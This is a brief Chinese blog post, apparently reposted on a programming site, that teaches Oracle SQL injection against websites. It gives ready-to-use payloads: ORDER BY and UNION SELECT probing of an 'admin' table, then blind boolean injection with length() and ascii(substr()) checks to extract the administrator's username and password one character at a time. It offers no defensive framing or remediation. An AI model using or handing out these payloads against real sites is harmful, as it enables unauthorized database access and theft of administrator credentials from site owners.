Oracle注入

本文主要是介绍Oracle注入，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

先判断好注入点后

order by 长度

union select 'null',null,null ... from admin 如果在某个地方返回正确了，那么就能在这个注入点注入

推荐看一本书《藏锋者》

字段长度太短的话使用另一种注入方式来注入 在网站后方加入 and (select count(*) from admin)<>0返回正确说明存在该表

判断完成后，再将*换成表名去猜测列名  可以猜测user password等常用列名

and (select count(*) from admin where length(name)>=5)=1　　该句用来猜测管理员用户名长度

and (select count(*) from admin where ascii(substr(name,1,1))>=97)=1   ascii用来获取ASCII码值，去判断 97为a

第二个的话改这个数(name,2,1)

判断密码一样是通过把name改成pwd方法一样

这篇关于Oracle注入的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！